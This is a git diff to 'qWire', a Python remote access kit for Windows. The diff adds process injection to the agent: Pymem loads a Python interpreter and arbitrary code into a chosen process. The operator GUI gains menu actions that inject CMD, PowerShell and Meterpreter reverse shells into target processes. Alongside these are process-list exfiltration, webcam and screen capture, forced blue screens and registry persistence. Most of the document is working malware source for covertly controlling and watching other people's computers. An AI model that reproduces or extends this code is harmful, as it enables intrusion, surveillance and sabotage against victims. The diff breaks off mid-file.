diff --git a/README.md b/README.md index c31cd9a..b6f9e13 100644 --- a/README.md +++ b/README.md @@ -24,10 +24,11 @@ If you're looking for an open-source project to abuse, Look elsewhere. The autho Created with Python 3.9.X Client tested on: -* Windows 10 +* Windows 10 x64 +* Windows 7 Ultimate SP1 x64 Server tested on: -* Debian +* Debian # Features at release 1.0.0 * Power Management (Shutdown/Reboot) @@ -72,3 +73,11 @@ Server tested on: * Surveillance > Webcam > Snapshot * Various code optimizations * Fixed issue with agent disconnecting when server shuts down during initial handshake + +# Update 1.0.22 +* Tested agent on Windows 7 Ultimate SP1. Working. +* Re-coded task manager on client and server +* Optimized context menu code. Menu now loads instantly +* Tested powershell reg key peristence on Windows 7. Working. +* Created python injector in Task Manager. Can inject python code into process's. +* Added CMD, PS and Python Meterpreter shells to the python injector \ No newline at end of file diff --git a/agent/windows_10/agent.py b/agent/windows_10/agent.py index 116752c..8ecbe8a 100644 --- a/agent/windows_10/agent.py +++ b/agent/windows_10/agent.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import socket @@ -22,10 +22,11 @@ import threading import struct import cv2 - +import psutil from PIL import ImageGrab from time import sleep from cryptography.fernet import Fernet +from pymem import Pymem SEP = '' #Create static seperator string BUFFER = 4096 #Create static buffer int @@ -57,12 +58,6 @@ def get_windows_version(self): version_output = version_output.replace('\n','') #Replace new line with empty string return version_output.strip('\r') #Strip carriage return and return the output - #Function will return the output of all running process's on the machine - def get_running_process(self): - command = subprocess.Popen(['powershell', 'get-process'],stdout=subprocess.PIPE,shell=True) #Run the command - com_output = command.stdout.read().decode() #Capture, read and decode output - return com_output #Return output - #Function will get computers local ip and return it as string def get_local_ip(self): local_ip = socket.gethostbyname(socket.gethostname()) #Resolve system name @@ -116,8 +111,17 @@ def shutdown_computer(self): #Function will send back a list of running process's to the server def extract_process_list(self): - process_list = Utilitys().get_running_process() #Get process's - ExfilSocket().exfil_socket_send(process_list) #Send to server + process_string = '' # Define a local string to store information about the process's + for process in psutil.process_iter(): # For each process found in the running process's + process_name = process.name() # Get process name + pid = process.pid # Get pid of process + try: + username = process.username() # Get username + except psutil.AccessDenied: + username = 'NT AUTHORITY\SYSTEM' # If we are running in userland, admin process's will raise an error on call to username. manually set uname. + string = f'{process_name}{SEP}{str(pid)}{SEP}{username}{SEP}\n' #Create string + process_string += string # Append string to local master string + ExfilSocket().exfil_socket_send(process_string) #Send local master string to server #Function will kill a task by the pid passed as parameter and send the output to the server def kill_task(self,pid): @@ -162,6 +166,7 @@ def __init__(self): self.process_manager = 'proc_list' self.term_process = 'terminate' self.snapshot = 'snap_shot' + self.inject_python = 'inject_pie' #Function will connect to server to initiate handshake def connect_to_server(self): @@ -259,6 +264,8 @@ def main(self): SystemManager().kill_task(server_command[1]) #kill the task by pid received from server if action_flag == self.snapshot: #if the action is to send a snapshot from the webcam StreamSocket().webcam_snapshot() #Send a webcam snapshot + if action_flag == self.inject_python: #If the action is to inject some python code, + CodeExecution().inject_and_exec(server_command[1],server_command[2]) #Inject python code #Function will retrieve all data sent by server socket def recv_all_data(self): @@ -379,4 +386,11 @@ def exec_(system_command): #Create local exec function pass MultiProcessor().start_child_thread_arg(exec_,system_command) #Start new thread for shell commands. Main thread will continue to communicate with server + #Function will inject a python interpreter into a process and then load + #Python code to be executed by it. + def inject_and_exec(self,process_name,python_code): + process = Pymem(process_name) #Hooke the process + process.inject_python_interpreter() #Inject the python dll + process.inject_python_shellcode(python_code) #Inject the python code into the code + ClientSocket().connect_to_server() \ No newline at end of file diff --git a/core/Qt5/builder_guis/windows10/agent_builder_window.py b/core/Qt5/builder_guis/windows10/agent_builder_window.py index 622238a..c1c02f6 100644 --- a/core/Qt5/builder_guis/windows10/agent_builder_window.py +++ b/core/Qt5/builder_guis/windows10/agent_builder_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from core.logging.logging import DNSconfigs,NetworkingConfigs from core.builder.windows10.agent_builder import Builder diff --git a/core/Qt5/handling_guis/image_display_window.py b/core/Qt5/handling_guis/image_display_window.py index f8e9c25..a2bf544 100644 --- a/core/Qt5/handling_guis/image_display_window.py +++ b/core/Qt5/handling_guis/image_display_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import os @@ -32,10 +32,10 @@ def get_image_size(self): #Function will save a file to the image_data directory with a random string for the name def save_raw_file(self): - file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg' - original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame) - LoggingUtilitys().write_bytes_to_file(file_path,original_image_data) - Notifications().raise_notification( + file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg' #Create local file path string with random string for file name + original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame) #Retrieve the bytes of the original image + LoggingUtilitys().write_bytes_to_file(file_path,original_image_data) #Write those bytes to a new file and save it + Notifications().raise_notification( #Notify the user with the name of the screenshot f'Saved file as {file_path}', 'Success' ) diff --git a/core/Qt5/handling_guis/task_manager_window.py b/core/Qt5/handling_guis/task_manager_window.py index bfc83a9..546b812 100644 --- a/core/Qt5/handling_guis/task_manager_window.py +++ b/core/Qt5/handling_guis/task_manager_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtCore, QtWidgets from PyQt5.Qt import Qt @@ -23,13 +23,51 @@ from core.client_handling.enumeration import SystemCommands from core.client_handling.system import SystemManager -from core.client_handling.shell import Meterpreter +from core.client_handling.shell import Meterpreter,SystemShell from core.client_handling.meterpreter_payloads import MSFPayload import os class Ui_task_manager_dialog(QWidget): + def __init__(self): + super(Ui_task_manager_dialog, self).__init__() + """ + Start menu init. Create Menu Object. + """ + self.context_menu = QMenu(self) # Create Menu Object + """ + Add submenus the main menu/other menus + """ + self.injector_menu = self.context_menu.addMenu('Injector') + self.shellcode_menu = self.injector_menu.addMenu('Shellcode') + self.python_menu = self.injector_menu.addMenu('Python') + self.meterpreter_menu = self.shellcode_menu.addMenu('Meterpreter') + """ + Add actions to to the menu/sub menus + """ + self.refresh_task_list = self.context_menu.addAction('Refresh Tasks') + self.kill_process = self.context_menu.addAction('Kill Process') + self.x64_reverse_tcp = self.meterpreter_menu.addAction('x64/Reverse TCP') + self.cmd_shell = self.python_menu.addAction('CMD Shell') + self.ps_shell = self.python_menu.addAction('PowerShell') + self.python_meterpreter_shell = self.python_menu.addAction('Meterpreter') + """ + Set the icons for each action on the context menu + """ + self.refresh_task_list.setIcon(IconObj().sync_icon) + self.kill_process.setIcon(IconObj().kill_task_icon) + self.injector_menu.setIcon(IconObj().injector_icon) + self.meterpreter_menu.setIcon(IconObj().msf_icon) + self.shellcode_menu.setIcon(IconObj().shellcode_icon) + self.python_menu.setIcon(IconObj().python_icon) + self.cmd_shell.setIcon(IconObj().cmd_shell_icon) + self.ps_shell.setIcon(IconObj().ps_shell_icon) + self.python_meterpreter_shell.setIcon(IconObj().python_icon) + """ + End menu init. + """ + #Function will refresh the UI with current tasks from the system def refresh_tasks(self): SystemCommands().extract_running_process(self.encryption_key,self.client_socket_obj) #Tell the client to send of the current running tasks @@ -50,71 +88,39 @@ def kill_task(self): break #Break the loop self.refresh_tasks() #Refresh the task list - #Function will populate the task list with the data received from the client + #Function will populate the gui with process information received from the client def populate_task_list(self): - client_task_data = LoggingUtilitys().retrieve_file_data(DSFilePath().task_manager_file) #Retrieve data written to file from socket - row_count = 0 #Set row count to 0 - column_count = 0 #Set column count to 0 - self.task_table_widget.setRowCount(len(client_task_data.split(','))/3) #Set the row count to the number of data pieces divided by 3 - data = client_task_data.split(', ') #Split the data into array - for item in data: #For each item in data array, - if item != '': #If the item is not an empty string, - if column_count == 3: #Check to make sure column count doesnt extend past 3 slots - column_count = 0 #Set it to 0 - row_count += 1 #Add 1 to the row count - if column_count == 2: #If c count == 2, try to split the item to check if it's a valid cpu item - try: - repr(item.split('.')[1]) #Force error if item can't be split - except Exception: #If error occurs - item = 'N/A' #Set CPU resource to N/A,else it's a valid cpu measurement and can be posted - data_cell = QtWidgets.QTableWidgetItem(item.replace('"','').replace("'",'')) #Populate item object with data - data_cell.setTextAlignment(Qt.AlignLeft) #Set text alignment - data_cell.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable) #Make sure item can't be edited but can be selected - data_cell.setBackground(Qt.transparent) #Set background to transparent - self.task_table_widget.setItem(row_count,column_count,data_cell) #Add item to the table widget - column_count += 1 #Increase column count - os.remove(DSFilePath().task_manager_file) #Remove task manager file as data is no longer needed + client_task_data = LoggingUtilitys().retrieve_file_data( + DSFilePath().task_manager_file) # Retrieve data written to file from socket + row_count = 0 #Set row and column counts to 0 + column_count = 0 + self.task_table_widget.setRowCount(len(client_task_data.split('\n'))) #Define length of table by the string split by new lines. Each line reps a process + for data in client_task_data.split(''): #For each piece of data + data_cell = QtWidgets.QTableWidgetItem(data.replace('\n','')) # Populate item object with data + data_cell.setTextAlignment(Qt.AlignLeft) # Set text alignment + data_cell.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable) # Make sure item can't be edited but can be selected + data_cell.setBackground(Qt.transparent) # Set background to transparent + self.task_table_widget.setItem(row_count, column_count, data_cell) # Add item to the table widget + column_count += 1 # Increase column count + os.remove(DSFilePath().task_manager_file) # Remove task manager file as data is no longer needed def eventFilter(self, source, event): if event.type() == QEvent.ContextMenu and source is self.task_table_widget: - """ - Create Menu Object - """ - context_menu = QMenu(self) # Create Menu Object - """ - Add submenus the main menu/other menus - """ - injector_menu = context_menu.addMenu('Injector') - shellcode_menu = injector_menu.addMenu('Shellcode') - meterpreter_menu = shellcode_menu.addMenu('Meterpreter') - """ - Add actions to to the menu/sub menus - """ - refresh_tasks = context_menu.addAction('Refresh Tasks') - kill_process = context_menu.addAction('Kill Process') - x64_reverse_tcp = meterpreter_menu.addAction('x64/Reverse TCP') - """ - Set the icons for each action on the context menu - """ - refresh_tasks.setIcon(IconObj().sync_icon) - kill_process.setIcon(IconObj().kill_task_icon) - injector_menu.setIcon(IconObj().injector_icon) - meterpreter_menu.setIcon(IconObj().msf_icon) - shellcode_menu.setIcon(IconObj().shellcode_icon) + """ Define the action of clicking on the menu/make the menu appear where the cursor was clicked """ - action = context_menu.exec_(self.mapToGlobal(event.globalPos())) # Define the click action bool for the menu + action = self.context_menu.exec_(self.mapToGlobal(event.globalPos())) # Define the click action bool for the menu """ Assign functions to the menu items when they are clicked """ - if action == refresh_tasks: #If the action is to refresh the tasks + if action == self.refresh_task_list: #If the action is to refresh the tasks self.refresh_tasks() #Refresh the window with current tasks - if action == kill_process: #If the action is to kill a process + if action == self.kill_process: #If the action is to kill a process self.kill_task() #Kill the task - if action == x64_reverse_tcp: #if the action is to inject msf shellcode + if action == self.x64_reverse_tcp: #if the action is to inject msf shellcode ConsoleWindow().log_to_console(f'Generating meterpreter shellcode, please standby!') #Log to console process_pid = self.task_table_widget.item(self.task_table_widget.currentRow(),1).text() #Get process pid Meterpreter().inject_msf_payload( #Prepare and inject payload @@ -123,6 +129,24 @@ def eventFilter(self, source, event): self.encryption_key, self.client_socket_obj) + if action == self.cmd_shell: #If the action is to inject a python cmd shell + proc_name = self.task_table_widget.item(self.task_table_widget.currentRow(),0).text() #Get the process name + SystemShell().inject_exec_CMD(self.client_socket_obj, #Inject the code + self.encryption_key, + proc_name) + + if action == self.ps_shell: #If the action is to inject a python powershell shell + proc_name = self.task_table_widget.item(self.task_table_widget.currentRow(), 0).text() #Get the process name + SystemShell().inject_exec_PS(self.client_socket_obj, #Inject the code + self.encryption_key, + proc_name) + + if action == self.python_meterpreter_shell: #If the action is to inject a python powershell shell + proc_name = self.task_table_widget.item(self.task_table_widget.currentRow(), 0).text() #Get the process name + Meterpreter().inject_exec_py_meter(self.client_socket_obj, #Inject the code + self.encryption_key, + proc_name) + return True return super().eventFilter(source, event) @@ -131,7 +155,7 @@ def setupUi(self, task_manager_dialog,client_socket_obj,encryption_key): Initialize UI parameters """ task_manager_dialog.setObjectName("task_manager_dialog") - task_manager_dialog.resize(535, 704) + task_manager_dialog.resize(680, 704) task_manager_dialog.setWindowIcon(IconObj().task_manager_icon) """ Make encryption key and client socket obj accessible throughout the class @@ -143,7 +167,7 @@ def setupUi(self, task_manager_dialog,client_socket_obj,encryption_key): Create object, set geometry, stylesheet and name """ self.task_table_widget = QtWidgets.QTableWidget(task_manager_dialog) - self.task_table_widget.setGeometry(QtCore.QRect(20, 30, 491, 581)) + self.task_table_widget.setGeometry(QtCore.QRect(20, 30, 640, 581)) self.task_table_widget.setStyleSheet(f"background-image: url({BGPath().task_man_bg});") self.task_table_widget.setObjectName("task_table_widget") """ @@ -156,10 +180,10 @@ def setupUi(self, task_manager_dialog,client_socket_obj,encryption_key): self.task_table_widget.setColumnWidth(0, 290) item = QtWidgets.QTableWidgetItem() self.task_table_widget.setHorizontalHeaderItem(1, item) - self.task_table_widget.setColumnWidth(1, 99) + self.task_table_widget.setColumnWidth(1, 100) item = QtWidgets.QTableWidgetItem() self.task_table_widget.setHorizontalHeaderItem(2, item) - self.task_table_widget.setColumnWidth(2, 92) + self.task_table_widget.setColumnWidth(2, 200) """ Set configurations for the table widget which will display all of our running process's on the client @@ -190,4 +214,4 @@ def retranslateUi(self, task_manager_dialog): item = self.task_table_widget.horizontalHeaderItem(1) item.setText(_translate("task_manager_dialog", "PID")) item = self.task_table_widget.horizontalHeaderItem(2) - item.setText(_translate("task_manager_dialog", "CPU")) + item.setText(_translate("task_manager_dialog", "User")) diff --git a/core/Qt5/icons.py b/core/Qt5/icons.py index 3310580..ed8c967 100644 --- a/core/Qt5/icons.py +++ b/core/Qt5/icons.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from ..logging.logging import LoggingUtilitys from PyQt5.QtGui import QIcon,QPixmap diff --git a/core/Qt5/main_window/qwire_main_gui.py b/core/Qt5/main_window/qwire_main_gui.py index d34c556..c1ef733 100644 --- a/core/Qt5/main_window/qwire_main_gui.py +++ b/core/Qt5/main_window/qwire_main_gui.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import os @@ -48,10 +48,115 @@ active_connections_array = [] listening_sockets_array = [] -BUILD_VERSION = '1.0.21' +BUILD_VERSION = '1.0.22' class Ui_main_window(QWidget): + def __init__(self): + super(Ui_main_window, self).__init__() + """ + Define context menu object with init method. + This will prevent the menu from taking a long amount of time + to appear when the menu is clicked. + """ + self.context_menu = QMenu(self) # Create Menu Object + """ + Create root submenus on the main menu + """ + self.networking_menu = self.context_menu.addMenu('Networking') # Create networking submenu + self.shells_menu = self.context_menu.addMenu('Shells') # Create Shells Sub menu + self.sys_manager_menu = self.context_menu.addMenu('System') # Add system functions menu + self.enumeration_menu = self.context_menu.addMenu('Enumeration') # Enumeration menu + self.surveillance_menu = self.context_menu.addMenu('Surveillance') # Add surveillance menu + """ + Add sub-menus to root sub-menus + """ + # NETWORKING MENU + # (none) + + # SHELLS MENU + self.meterpreter_menu = self.shells_menu.addMenu('Meterpreter') # Add meterpreter sub menu to shells sub menu + self.system_menu = self.shells_menu.addMenu('System') # Add system shells sub menu to sub menu + + # SYSTEM MANAGER MENU + # (none) + + # ENUMERATION MENU + # (none) + + # SURVEILLANCE MENU + self.desktop_menu = self.surveillance_menu.addMenu('Desktop') + self.webcam_menu = self.surveillance_menu.addMenu('Webcam') + """ + Add actions items to menus + """ + # NETWORKING MENU + self.ping_client = self.networking_menu.addAction('Ping') # Add ping action to networking menu + self.reconnect_action = self.networking_menu.addAction('Reconnect') # Add reconnect action + self.disconnect_action = self.networking_menu.addAction('Disconnect') # Add disconnect action + + # SHELLS MENU + # METERPRETER MENU + self.python_meterpreter = self.meterpreter_menu.addAction('Python') # Add python meterpreter action to shells sub menu + # SYSTEM MENU + self.CMD_shell = self.system_menu.addAction('CMD Shell') # Add Command shell action to system shells menu + self.powershell_shell = self.system_menu.addAction('PowerShell') # Add powershell reverse shell to submenu + + # SYSTEM MANAGER MENU + self.blue_screen = self.sys_manager_menu.addAction('BSoD') # Add blue screen to sys functions menu + self.reboot_client = self.sys_manager_menu.addAction('Reboot') # Add reboot client function + self.shutdown_client = self.sys_manager_menu.addAction('Shutdown') # Shutdown client option + + # ENUMERATION MENU + self.system_info = self.enumeration_menu.addAction('System Info') # System Information exfiltration + self.get_client_process = self.enumeration_menu.addAction('Task Manager') # Task Manager + + # SURVEILLANCE MENU + # DESKTOP MENU + self.screenshot = self.desktop_menu.addAction('Screenshot') # Screenshot action + # WEBCAM MENU + self.snapshot = self.webcam_menu.addAction('Snapshot') + """ + Assemble Icons for menus and action items + """ + # NETWORKING MENU + self.networking_menu.setIcon(IconObj().net_icon) # Add Icon to networking menu + self.ping_client.setIcon(IconObj().ping_icon) # Ping Icon + self.disconnect_action.setIcon(IconObj().disconnect_icon) # Add Icon + self.reconnect_action.setIcon(IconObj().reconnect_icon) # Add icon to reconnect action + + # SHELLS MENU + self.shells_menu.setIcon(IconObj().shells_icon) # Create shells menu icon + # METERPRETER MENU + self.meterpreter_menu.setIcon(IconObj().msf_icon) # Add icon to meterpreter menu + self.python_meterpreter.setIcon(IconObj().python_icon) # Add python icon to python meterpreter + # SYSTEM MENU + self.system_menu.setIcon(IconObj().system_icon) # Add icon to system shells menu + self.powershell_shell.setIcon(IconObj().ps_shell_icon) # Add icon to powershell shell option + self.CMD_shell.setIcon(IconObj().cmd_shell_icon) + + # SYSTEM MANAGER MENU + self.sys_manager_menu.setIcon(IconObj().system_icon) # Add icon to system functions menu + self.blue_screen.setIcon(IconObj().bsod_icon) # Icon + self.reboot_client.setIcon(IconObj().reconnect_icon) # Reuse reconnect icon + self.shutdown_client.setIcon(IconObj().shutdown_icon) # Icon + + # ENUMERATION MENU + self.enumeration_menu.setIcon(IconObj().magn_glass_icon) # Icon + self.system_info.setIcon(IconObj().system_icon) # Icon + self.get_client_process.setIcon(IconObj().task_manager_icon) # Icon + + # SURVEILLANCE MENU + self.surveillance_menu.setIcon(IconObj().surveillance_icon) # IcoN + # DESKTOP MENU + self.desktop_menu.setIcon(IconObj().system_icon) + self.screenshot.setIcon(IconObj().screenshot_icon) # Icon + # WEBCAM MENU + self.webcam_menu.setIcon(IconObj().webcam_icon) + self.snapshot.setIcon(IconObj().screenshot_icon) + + + #Function will update console window with updates read from file def check_for_console_updates(self): with open(DSFilePath().console_output_file,'r') as console_output: @@ -181,6 +286,7 @@ def open_new_window(self,UI): self.ui.setupUi(self.window) self.window.show() + #Function creates context menu when client is right clicked in the list. Used to interact with client def eventFilter(self,source,event): """ @@ -207,153 +313,55 @@ def remove_client_socket(): if event.type() == QEvent.ContextMenu and source is self.active_connections_list and self.active_connections_list.currentRow() > -1: #If event is left click and the source is the active connections list """ - Define context menu object - """ #And there is a connection in the row - context_menu = QMenu(self) #Create Menu Object - """ - Create root submenus on the main menu - """ - networking_menu = context_menu.addMenu('Networking') #Create networking submenu - shells_menu = context_menu.addMenu('Shells') # Create Shells Sub menu - sys_manager_menu = context_menu.addMenu('System') # Add system functions menu - enumeration_menu = context_menu.addMenu('Enumeration') # Enumeration menu - surveillance_menu = context_menu.addMenu('Surveillance') # Add surveillance menu - """ - Add sub-menus to root sub-menus - """ - #NETWORKING MENU - #(none) - - #SHELLS MENU - meterpreter_menu = shells_menu.addMenu('Meterpreter') #Add meterpreter sub menu to shells sub menu - system_menu = shells_menu.addMenu('System') # Add system shells sub menu to sub menu - - #SYSTEM MANAGER MENU - #(none) - - #ENUMERATION MENU - #(none) - - #SURVEILLANCE MENU - desktop_menu = surveillance_menu.addMenu('Desktop') - webcam_menu = surveillance_menu.addMenu('Webcam') - """ - Add actions items to menus - """ - #NETWORKING MENU - ping_client = networking_menu.addAction('Ping') # Add ping action to networking menu - reconnect_action = networking_menu.addAction('Reconnect') #Add reconnect action - disconnect_action = networking_menu.addAction('Disconnect') #Add disconnect action - - #SHELLS MENU - #METERPRETER MENU - python_meterpreter = meterpreter_menu.addAction('Python') # Add python meterpreter action to shells sub menu - #SYSTEM MENU - CMD_shell = system_menu.addAction('CMD Shell') # Add Command shell action to system shells menu - powershell_shell = system_menu.addAction('PowerShell') # Add powershell reverse shell to submenu - - #SYSTEM MANAGER MENU - blue_screen = sys_manager_menu.addAction('BSoD') # Add blue screen to sys functions menu - reboot_client = sys_manager_menu.addAction('Reboot') # Add reboot client function - shutdown_client = sys_manager_menu.addAction('Shutdown') # Shutdown client option - - #ENUMERATION MENU - system_info = enumeration_menu.addAction('System Info') #System Information exfiltration - get_client_process = enumeration_menu.addAction('Task Manager') #Task Manager - - #SURVEILLANCE MENU - #DESKTOP MENU - screenshot = desktop_menu.addAction('Screenshot') # Screenshot action - #WEBCAM MENU - snapshot = webcam_menu.addAction('Snapshot') - """ - Assemble Icons for menus and action items - """ - #NETWORKING MENU - networking_menu.setIcon(IconObj().net_icon) #Add Icon to networking menu - ping_client.setIcon(IconObj().ping_icon) #Ping Icon - disconnect_action.setIcon(IconObj().disconnect_icon) #Add Icon - reconnect_action.setIcon(IconObj().reconnect_icon) #Add icon to reconnect action - - #SHELLS MENU - shells_menu.setIcon(IconObj().shells_icon) #Create shells menu icon - #METERPRETER MENU - meterpreter_menu.setIcon(IconObj().msf_icon) #Add icon to meterpreter menu - python_meterpreter.setIcon(IconObj().python_icon) #Add python icon to python meterpreter - #SYSTEM MENU - system_menu.setIcon(IconObj().system_icon) #Add icon to system shells menu - powershell_shell.setIcon(IconObj().ps_shell_icon) #Add icon to powershell shell option - CMD_shell.setIcon(IconObj().cmd_shell_icon) - - #SYSTEM MANAGER MENU - sys_manager_menu.setIcon(IconObj().system_icon) #Add icon to system functions menu - blue_screen.setIcon(IconObj().bsod_icon) #Icon - reboot_client.setIcon(IconObj().reconnect_icon) #Reuse reconnect icon - shutdown_client.setIcon(IconObj().shutdown_icon) #Icon - - #ENUMERATION MENU - enumeration_menu.setIcon(IconObj().magn_glass_icon) #Icon - system_info.setIcon(IconObj().system_icon) #Icon - get_client_process.setIcon(IconObj().task_manager_icon) #Icon - - #SURVEILLANCE MENU - surveillance_menu.setIcon(IconObj().surveillance_icon) #IcoN - #DESKTOP MENU - desktop_menu.setIcon(IconObj().system_icon) - screenshot.setIcon(IconObj().screenshot_icon) #Icon - #WEBCAM MENU - webcam_menu.setIcon(IconObj().webcam_icon) - snapshot.setIcon(IconObj().screenshot_icon) - """ - Assign functions to actions - """ - action = context_menu.exec_(self.mapToGlobal(event.globalPos())) #Define the click action bool for the menu + Assign functions to actions + """ + action = self.context_menu.exec_( + self.mapToGlobal(event.globalPos())) # Define the click action bool for the menu - if action == python_meterpreter: #If python meterpreter is clicked + if action == self.python_meterpreter: #If python meterpreter is clicked lport = NetworkingConfigs().retrieve_shell_lport() # Get the listening port - ConsoleWindow().log_to_console('Starting python meterpreter listener on port {lport}') #Log to console + ConsoleWindow().log_to_console(f'Starting python meterpreter listener on port {lport}') #Log to console Meterpreter().exec_python_meterpreter_shell(lport, get_key_from_row(),get_client_socket_obj()) #Send the shell code to the agent - if action == powershell_shell: #If powershell shell is clicked - lport = NetworkingConfigs().retrieve_shell_lport() #Get the listening port - ConsoleWindow().log_to_console(f'Starting netcat listener on {lport}') #Log to console - SystemShell().exec_reverse_shell(lport, get_key_from_row(), get_client_socket_obj()) #Send the shell code + if action == self.powershell_shell: #If powershell shell is clicked + ConsoleWindow().log_to_console(f'Starting netcat listener') #Log to console + SystemShell().exec_reverse_shell(get_key_from_row(), get_client_socket_obj()) #Send the shell code - if action == CMD_shell: + if action == self.CMD_shell: ConsoleWindow().log_to_console('Launching command shell on client') SystemShell().exec_cmd_shell(get_client_socket_obj(),get_key_from_row()) - if action == reconnect_action: #If the reconnect action is clicked + if action == self.reconnect_action: #If the reconnect action is clicked ConsoleWindow().log_to_console('Reconnecting client') #Log action to console NetHandle().client_reconnect(get_key_from_row(),get_client_socket_obj()) #Tell the client to reconnect ClientWindow().remove_active_connection(Utilitys().retrieve_client_info_array(), get_key_from_row().decode()) remove_client_socket() - if action == ping_client: #If action is ping client + if action == self.ping_client: #If action is ping client NetHandle().ping_client(get_key_from_row(),get_client_socket_obj()) #Ping the client and catch the reply - if action == blue_screen: #If action is to blue screen the client + if action == self.blue_screen: #If action is to blue screen the client ConsoleWindow().log_to_console('Forcing system crash on client') #Log action to console SystemManager().force_blue_screen(get_key_from_row(),get_client_socket_obj()) #Force agent to bluescreen computer ClientWindow().remove_active_connection(Utilitys().retrieve_client_info_array(), #Remove client from screen get_key_from_row().decode()) remove_client_socket() #Remove the socket - if action == reboot_client: #If action is to reboot the client + if action == self.reboot_client: #If action is to reboot the client ConsoleWindow().log_to_console('Rebooting Client') #Log to console SystemManager().reboot_client_system(get_key_from_row(),get_client_socket_obj()) #Force agent to reboot computer ClientWindow().remove_active_connection(Utilitys().retrieve_client_info_array(),#Remove client from screen get_key_from_row().decode()) remove_client_socket() #Remove client socket - if action == shutdown_client: #If action is to shutdown the client + if action == self.shutdown_client: #If action is to shutdown the client ConsoleWindow().log_to_console('Shutting down client computer') #Log to console SystemManager().shutdown_client_system(get_key_from_row(),get_client_socket_obj())#Force agent to shutdown the computer ClientWindow().remove_active_connection(Utilitys().retrieve_client_info_array(),#Remove client from screen get_key_from_row().decode()) remove_client_socket() #Remove the socket - if action == system_info: + if action == self.system_info: ConsoleWindow().log_to_console('Retrieving client system information') #Log to console SystemCommands().exfil_sys_and_ip_info(get_key_from_row(),get_client_socket_obj()) #Tell agent to run commands, open socket to receive output while True: @@ -362,20 +370,20 @@ def remove_client_socket(): ConsoleWindow().log_to_console('Received output from client') #Log to console self.open_new_window(Ui_host_info_window) #Open window with the command output. Window will populate data from file. - if action == screenshot: + if action == self.screenshot: ConsoleWindow().log_to_console('Capturing screenshot from client') #Log to console Streaming().get_client_screenshot(get_key_from_row(),get_client_socket_obj()) #Get screenshot ConsoleWindow().log_to_console('Received screenshot') # Log to console self.open_new_window(Ui_image_data_window) #Open window with photo #os.remove(DSFilePath().streaming_frame) - if action == disconnect_action: #If action is to disconnect client + if action == self.disconnect_action: #If action is to disconnect client ConsoleWindow().log_to_console('Disconnecting client') #Log to console NetHandle().disconnect_client(get_key_from_row(),get_client_socket_obj()) #Disconnect the client ClientWindow().remove_active_connection(Utilitys().retrieve_client_info_array(),get_key_from_row().decode()) #Remove the connection from the array remove_client_socket() #Remove the socket - if action == get_client_process: #If the action is to get the client process + if action == self.get_client_process: #If the action is to get the client process ConsoleWindow().log_to_console('Starting task manager') #Log to console SystemCommands().extract_running_process(get_key_from_row(),get_client_socket_obj()) #Instruct agent to exfiltrate client process's while True: #Start while loop @@ -384,7 +392,7 @@ def remove_client_socket(): break #Break the loop self.open_client_compatible_window(Ui_task_manager_dialog,get_client_socket_obj(),get_key_from_row()) #Open the task manager window - if action == snapshot: + if action == self.snapshot: ConsoleWindow().log_to_console('Paging client for webcam') if Streaming().get_client_snapshot(get_key_from_row(),get_client_socket_obj()) == True: self.open_new_window(Ui_image_data_window) @@ -592,7 +600,7 @@ def retranslateUi(self, main_window): self.update_dns.setText(_translate("main_window", "Update DNS")) self.version_info.setText(_translate("main_window", "Version Info")) self.update_logs.setText(_translate("main_window", "Update Log")) - self.windows_10_agent.setText(_translate("main_window", "Windows 10")) + self.windows_10_agent.setText(_translate("main_window", "Windows 10/7")) self.qwire_settings.setText(_translate("main_window", "qWire Settings")) self.connections_label.setText(_translate("main_window", "Connections: 0")) self.data_label.setText(_translate("main_window", "Data tx/rx: 0\\b")) diff --git a/core/Qt5/misc_gui/ListenerGUI.py b/core/Qt5/misc_gui/ListenerGUI.py index a14c85f..1a9a4a7 100644 --- a/core/Qt5/misc_gui/ListenerGUI.py +++ b/core/Qt5/misc_gui/ListenerGUI.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5.QtWidgets import QWidget,QMenu from PyQt5.QtCore import QEvent diff --git a/core/Qt5/misc_gui/info_window.py b/core/Qt5/misc_gui/info_window.py index 52d20a4..94511c4 100644 --- a/core/Qt5/misc_gui/info_window.py +++ b/core/Qt5/misc_gui/info_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from core.utils.file_paths import BGPath from core.Qt5.icons import IconObj diff --git a/core/Qt5/misc_gui/sysinfo_window.py b/core/Qt5/misc_gui/sysinfo_window.py index 296d419..8e0c9c4 100644 --- a/core/Qt5/misc_gui/sysinfo_window.py +++ b/core/Qt5/misc_gui/sysinfo_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtCore, QtWidgets, Qt from core.Qt5.icons import 